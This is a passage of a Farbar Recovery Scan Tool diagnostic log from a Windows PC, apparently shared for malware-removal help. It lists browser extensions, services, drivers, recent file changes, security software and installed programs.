FF Extension: Red Cats (green flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{dd30bf68-268a-4815-ad48-8740b774c764}.xpi [2012-05-07]
FF Extension: Red Cats (blue flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{ff356687-aa08-463d-a46c-11c451824939}.xpi [2012-05-07]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-02-16]
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-02]
CHR Extension: (YouTube) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-16]
CHR Extension: (Adblock Plus) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-04-02]
CHR Extension: (Google Search) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-16]
CHR Extension: (Google Wallet) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-16]
CHR Extension: (Gmail) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-16]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AERTFilters; C:\Windows\system32\AERTSrv.exe [81920 2008-08-19] (Andrea Electronics Corporation)
S3 getPlusHelper; C:\Program Files\NOS\bin\getPlus_Helper.dll [51168 2009-09-23] (NOS Microsystems Ltd.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
S2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-03-17] (Malwarebytes Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22184 2015-01-30] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [284472 2015-01-30] (Microsoft Corporation)
S3 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.exe [65536 2004-03-18] (HP) [File not signed]
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [69632 2007-07-11] (MicroVision Development, Inc.) [File not signed]
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-20] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 FsUsbExDisk; C:\Windows\system32\FsUsbExDisk.SYS [36608 2010-06-14] () [File not signed]
S4 JRAID; C:\Windows\system32\drivers\jraid.sys [79960 2008-08-19] (JMicron Technology Corp.)
R3 KMWDFILTER; C:\Windows\System32\DRIVERS\KMWDFILTER.sys [17408 2008-10-09] (Windows ® Codename Longhorn DDK provider)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2015-03-17] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2015-03-17] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [239224 2014-11-15] (Microsoft Corporation)
R3 pfc; C:\Windows\System32\drivers\pfc.sys [21248 2003-09-19] (Padus, Inc.) [File not signed]
S3 rt70x86; C:\Windows\System32\DRIVERS\netr70.sys [306016 2010-04-27] (Ralink Technology Corp.)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-08-19] (Windows ® Codename Longhorn DDK provider)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [13464 2014-07-02] ()
S3 cpuz134; \??\C:\Users\Angel\AppData\Local\Temp\cpuz134\cpuz134_x32.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-14 23:38 - 2015-04-14 23:38 - 00000000 ____D () C:\Users\Angel\Desktop\FRST-OlderVersion
2015-04-13 15:11 - 2015-04-13 15:15 - 00035765 _____ () C:\Users\Angel\Desktop\Addition.txt
2015-04-13 15:09 - 2015-04-14 23:47 - 00019787 _____ () C:\Users\Angel\Desktop\FRST.txt
2015-04-13 15:09 - 2015-04-14 23:38 - 01136128 _____ (Farbar) C:\Users\Angel\Desktop\FRST.exe
2015-04-13 15:06 - 2015-04-13 15:06 - 00001063 _____ () C:\Malware.txt
2015-04-13 14:44 - 2015-04-13 14:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-04-13 14:41 - 2015-04-13 14:41 - 21540440 _____ (Malwarebytes Corporation ) C:\Users\Angel\Downloads\mbam-setup-2.1.4.1018.exe
2015-04-13 14:32 - 2015-04-13 14:32 - 02217984 _____ () C:\Users\Angel\Downloads\adwcleaner_4.201.exe
2015-04-13 14:19 - 2015-04-13 14:19 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Angel\Downloads\revosetup.exe
2015-04-13 14:19 - 2015-04-13 14:19 - 00001059 _____ () C:\Users\Angel\Desktop\Revo Uninstaller.lnk
2015-04-13 14:19 - 2015-04-13 14:19 - 00000000 ____D () C:\Program Files\VS Revo Group
2015-04-12 20:26 - 2015-04-13 20:54 - 00007446 _____ () C:\Windows\PFRO.log
2015-04-11 22:51 - 2015-04-11 22:51 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2015-04-11 22:51 - 2015-04-11 22:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-04-11 22:50 - 2015-04-11 22:50 - 00000000 ____D () C:\Program Files\iPod
2015-04-11 22:49 - 2015-04-11 22:49 - 00000000 ____D () C:\Program Files\Bonjour
2015-04-04 22:22 - 2015-04-04 22:22 - 00000000 ____D () C:\ProgramData\WindowsSearch
2015-04-03 18:19 - 2015-04-14 23:43 - 00446575 _____ () C:\Windows\WindowsUpdate.log
2015-04-03 17:31 - 2015-04-03 17:31 - 00000000 ____D () C:\Windows\pss
2015-04-03 17:17 - 2015-04-14 23:46 - 00000000 ____D () C:\FRST
2015-04-02 21:41 - 2015-04-02 21:42 - 00010074 _____ () C:\Users\Angel\Downloads\hijackthis.log
2015-04-02 21:40 - 2015-04-02 21:40 - 00388608 _____ (Trend Micro Inc.) C:\Users\Angel\Downloads\HijackThis.exe
2015-04-02 21:32 - 2015-04-02 21:32 - 00000806 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2015-04-02 21:31 - 2015-04-02 21:32 - 00000000 ____D () C:\Program Files\CCleaner
2015-04-02 21:20 - 2015-04-02 21:20 - 05346704 _____ (Piriform Ltd) C:\Users\Angel\Downloads\ccsetup504pro.exe
2015-04-02 19:51 - 2015-01-28 20:35 - 00369664 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2015-04-02 19:50 - 2015-01-28 20:35 - 00975360 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-04-02 19:48 - 2015-02-25 19:18 - 02064384 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-04-02 19:40 - 2015-02-19 21:03 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-04-02 19:40 - 2015-02-19 19:28 - 00296960 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-04-02 19:39 - 2015-02-25 21:01 - 03604408 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-04-02 19:39 - 2015-02-25 21:01 - 03552184 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-04-02 19:39 - 2015-01-08 21:04 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-04-02 19:39 - 2015-01-08 19:18 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-04-02 19:38 - 2015-03-05 23:01 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-04-02 19:38 - 2015-01-20 21:02 - 00807936 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2015-04-02 19:37 - 2015-02-17 21:02 - 11587584 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-04-02 18:54 - 2015-02-21 12:37 - 12375040 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-04-02 18:54 - 2015-02-21 12:34 - 00367104 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-04-02 18:54 - 2015-02-21 12:29 - 09747968 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-04-02 18:54 - 2015-02-21 12:28 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-04-02 18:54 - 2015-02-21 12:22 - 01139200 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-04-02 18:54 - 2015-02-21 12:21 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-04-02 18:54 - 2015-02-21 12:21 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-04-02 18:54 - 2015-02-21 12:20 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2015-04-02 18:54 - 2015-02-21 12:20 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 01803264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-04-02 18:54 - 2015-02-21 12:18 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2015-04-02 18:54 - 2015-02-21 12:17 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-04-02 14:13 - 2015-04-13 14:34 - 00000000 ____D () C:\AdwCleaner
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-14 23:45 - 2014-09-29 09:15 - 00000644 _____ () C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2015-04-14 23:45 - 2014-09-29 09:00 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-04-14 23:45 - 2010-06-11 20:52 - 00000000 ____D () C:\Users\Angel\Tracing
2015-04-14 23:45 - 2009-02-09 18:08 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2015-04-14 23:44 - 2014-09-28 20:26 - 00000008 __RSH () C:\ProgramData\ntuser.pol
2015-04-14 23:44 - 2006-11-02 08:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-04-14 23:44 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2015-04-14 23:44 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2015-04-14 23:43 - 2006-11-02 08:01 - 00032550 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2015-04-14 23:39 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2015-04-14 23:34 - 2006-11-02 05:33 - 00747142 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-04-13 21:09 - 2012-04-28 13:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-04-13 15:20 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\Branding
2015-04-13 14:49 - 2014-09-29 09:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-04-13 14:44 - 2014-09-29 09:07 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-04-13 14:44 - 2014-09-29 09:07 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-04-12 20:42 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\rescache
2015-04-12 20:26 - 2006-11-02 07:37 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-04-12 20:26 - 2006-11-02 06:18 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\Program Files\iTunes
2015-04-11 22:50 - 2009-02-17 14:53 - 00000000 ____D () C:\Program Files\Common Files\Apple
2015-04-11 22:43 - 2015-02-09 21:19 - 00000000 ____D () C:\ProgramData\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB
2015-04-06 12:54 - 2009-08-31 22:05 - 00000000 ____D () C:\Users\Angel\Documents\BANK STUFF
2015-04-02 21:34 - 2014-12-08 16:18 - 00000000 ____D () C:\Program Files\Steam
2015-04-02 21:34 - 2010-05-07 11:04 - 00000000 ____D () C:\Windows\Minidump
2015-04-02 21:34 - 2009-09-21 11:48 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Media Player Classic
2015-04-02 21:34 - 2008-02-03 18:07 - 00000000 ____D () C:\Windows\Panther
2015-04-02 19:59 - 2014-09-29 09:15 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2015-04-02 19:54 - 2006-11-02 07:47 - 00374064 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-04-02 19:50 - 2009-02-17 14:20 - 00000000 ____D () C:\ProgramData\Microsoft Help
2015-04-02 19:48 - 2013-07-12 17:46 - 00000000 ____D () C:\Windows\system32\MRT
2015-04-02 19:41 - 2006-11-02 05:24 - 119837696 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2015-04-02 19:37 - 2015-02-19 22:52 - 00000000 ____D () C:\Program Files\iPod(68)
2015-04-02 18:45 - 2014-09-29 09:01 - 00002085 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2015-04-02 18:36 - 2009-02-16 19:37 - 00000000 ____D () C:\Users\Angel
2015-04-02 18:36 - 2006-11-02 05:22 - 58720256 _____ () C:\Windows\system32\config\software_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 44564480 _____ () C:\Windows\system32\config\components_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 41943040 _____ () C:\Windows\system32\config\system_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 05242880 _____ () C:\Windows\system32\config\default_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\security_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\sam_previous
2015-04-02 18:34 - 2014-12-10 21:10 - 00000000 ____D () C:\Users\Angel\AppData\Local\23897
2015-04-02 18:34 - 2014-12-03 23:05 - 00000000 ____D () C:\Users\Angel\AppData\Local\4657
2015-04-02 18:34 - 2014-12-01 20:28 - 00000000 ____D () C:\Users\Angel\AppData\Local\32244
2015-04-02 18:34 - 2014-09-29 09:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-04-02 18:34 - 2014-09-25 15:58 - 00000000 ____D () C:\Users\Public\518FC3555F9246E4AC8055FCEF3883E5
2015-04-02 18:34 - 2014-09-17 15:32 - 00000000 ____D () C:\Users\Public\B4D0DA65314B4041838806CA0CC88B7B
2015-04-02 18:34 - 2010-08-26 16:30 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\.BitTornado
2015-04-02 18:34 - 2009-09-21 12:05 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\vlc
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\ProgramData\NOS
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\Program Files\NOS
2015-04-02 18:34 - 2009-02-18 15:22 - 00000000 ____D () C:\Users\Angel\Desktop\Iconotopia
2015-04-02 18:34 - 2009-02-17 16:46 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HP
2015-04-02 18:34 - 2009-02-17 15:25 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2015-04-02 18:34 - 2009-02-17 14:20 - 00000000 ____D () C:\Users\Angel\AppData\Local\Microsoft Help
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 __RSD () C:\Windows\Media
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\spool
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\Msdtc
2015-04-02 18:33 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\registration
2015-04-02 17:53 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\schemas
2015-03-17 06:15 - 2014-09-29 09:07 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-03-17 06:15 - 2014-09-29 09:07 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-03-17 06:15 - 2014-09-29 09:07 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
 
==================== Files in the root of some directories =======
 
2014-08-04 18:04 - 2014-08-04 18:04 - 0000046 _____ () C:\Users\Angel\AppData\Roaming\WB.CFG
2009-02-17 13:32 - 2014-07-29 09:05 - 0007052 _____ () C:\Users\Angel\AppData\Local\d3d9caps.dat
2009-03-03 16:39 - 2012-09-17 20:20 - 0006656 _____ () C:\Users\Angel\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2009-02-17 15:05 - 2009-02-17 15:05 - 0008248 _____ () C:\Users\Angel\AppData\Local\en.ini
2009-02-17 16:51 - 2009-02-17 16:51 - 0000093 _____ () C:\Users\Angel\AppData\Local\fusioncache.dat
2009-02-17 16:00 - 2009-02-17 16:48 - 0003386 _____ () C:\ProgramData\hpzinstall.log
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-04-14 23:49
 
==================== End Of Log ============================
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 14-04-2015
Ran by Angel at 2015-04-14 23:48:06
Running from C:\Users\Angel\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
ABBYY FineReader 6.0 Sprint (HKLM\...\{ACF60000-22B9-4CE9-98D6-2CCF359BAC07}) (Version: 6.00.1395.4552 - ABBYY Software House)
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)
Acrobat.com (Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 1.0.4990 - Adobe Systems Inc.)
Adobe Download Manager (HKLM\...\{E2883E8F-472F-4fb0-9522-AC9BF37916A7}) (Version: 1.6.2.48 - NOS Microsystems Ltd.)
Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader X (10.1.13) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.13 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM\...\{2FE00055-C4F3-4F7A-AEDD-E198D54CF12F}) (Version: 3.1.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{28ED482A-56DB-47D9-8D9E-990FA8CD7D3D}) (Version: 8.1.0.18 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft PhotoImpression 5 (HKLM\...\{D433ABC3-0CD8-4BB0-B6A9-84501B4B47B7}) (Version:  - ArcSoft)
BitTornado 0.3.17 (HKLM\...\BitTornado) (Version: 0.3.17 - John Hoffman)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
BufferChm (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Business Tools Launcher (HKLM\...\{75685CA8-0B74-45BB-9C64-744A0FB79EDC}) (Version: 1.00.0000 - Dell Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform)
Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden
CreativeProjects (Version: 43.1.5.000 - Hewlett-Packard) Hidden
CreativeProjectsTemplates (Version: 43.1.5.000 - Hewlett-Packard) Hidden
CueTour (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Destinations (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Devil May Cry 3: Special Edition (HKLM\...\Steam App 6550) (Version:  - CAPCOM Co., Ltd.)
Devil May Cry 4 (HKLM\...\Steam App 45700) (Version:  - Capcom)
Director (Version: 43.1.5.000 - Hewlett-Packard) Hidden
EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
EPSON Attach To Email (HKLM\...\InstallShield_{20C45B32-5AB6-46A4-94EF-58950CAF05E5}) (Version: 1.01.0000 - SEIKO EPSON)
EPSON Attach To Email (Version: 1.01.0000 - SEIKO EPSON) Hidden
EPSON Copy Utility 3 (HKLM\...\{67EDD823-135A-4D59-87BD-950616D6E857}) (Version: 3.1.5.0 - )
EPSON Event Manager (HKLM\...\{48F22622-1CC2-4A83-9C1E-644DD96F832D}) (Version: 1.71.00 - )
EPSON File Manager (HKLM\...\{E86BC406-944E-41F6-ADE6-2C136734C96B}) (Version: 1.1.0.0 - )
EPSON Perf 3490 3590 Guide (HKLM\...\Silent Package Run-Time Sample) (Version:  - )
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - )
EPSON Scan Assistant (HKLM\...\{2A88F1BF-7041-4E42-84B1-6B4ACB83AC64}) (Version: 1.10.00 - )
Google Chrome (HKLM\...\Google Chrome) (Version: 41.0.2272.118 - Google Inc.)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
HP Image Zone 4.0 (HKLM\...\HP Photo & Imaging) (Version: 4.0 - HP)
HP Software Update (HKLM\...\{457791C5-D702-4143-A7B2-2744BE9573F2}) (Version: 2.0.39.20040212 - Hewlett-Packard)
HPSystemDiagnostics (Version: 1.5.0.0 - Your Company Name) Hidden
iCloud (HKLM\...\{79BD66B2-4DAE-4C3B-B08E-DC72E507C163}) (Version: 2.1.3.25 - Apple Inc.)
InstantShare (Version: 4.0.0.40 - Hewlett-Packard) Hidden
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
iTunes (HKLM\...\{0A37EE62-9A58-420D-90CC-4E52153112EE}) (Version: 11.3.0.54 - Apple Inc.)
Java 7 Update 55 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.550 - Oracle)
Java™ 6 Update 7 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160070}) (Version: 1.6.0.70 - Sun Microsystems, Inc.)
JavaFX 2.1.1 (HKLM\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Linksys Linksys Wireless-G USB Network Adapter Driver - WUSB54Gv4 (HKLM\...\{C7EEF2B9-8C16-4A04-B98D-B1A952A47E55}) (Version: 1.0 - Linksys, A Division of Cisco Systems, Inc.)
Malwarebytes Anti-Malware version 2.1.4.1018 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.4.1018 - Malwarebytes Corporation)
Media Player Classic (HKLM\...\Media Player Classic) (Version:  - )
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version:  - )
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
